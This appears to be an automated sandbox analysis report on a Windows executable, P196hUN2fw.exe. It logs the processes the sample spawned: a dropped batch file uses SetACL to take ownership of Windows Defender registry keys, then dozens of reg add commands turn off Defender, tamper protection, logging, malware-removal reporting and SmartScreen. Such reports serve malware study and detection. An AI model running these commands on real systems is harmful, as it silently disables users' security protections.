Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0 |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: P196hUN2fw.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error |
Source: P196hUN2fw.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0O |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606 |
Source: PowerRun.exe.0.dr, PowerRun64.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0 |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0 |
Source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com |
Source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com. |
Source: SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe |
Source: P196hUN2fw.exe, 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.dr | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: unknown | Process created: C:\Users\user\Desktop\P196hUN2fw.exe C:\Users\user\Desktop\P196hUN2fw.exe | |
Source: C:\Users\user\Desktop\P196hUN2fw.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | |
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\P196hUN2fw.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat | Jump to behavior |
Source: C:\Users\user\Desktop\P196hUN2fw.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown | Jump to behavior |
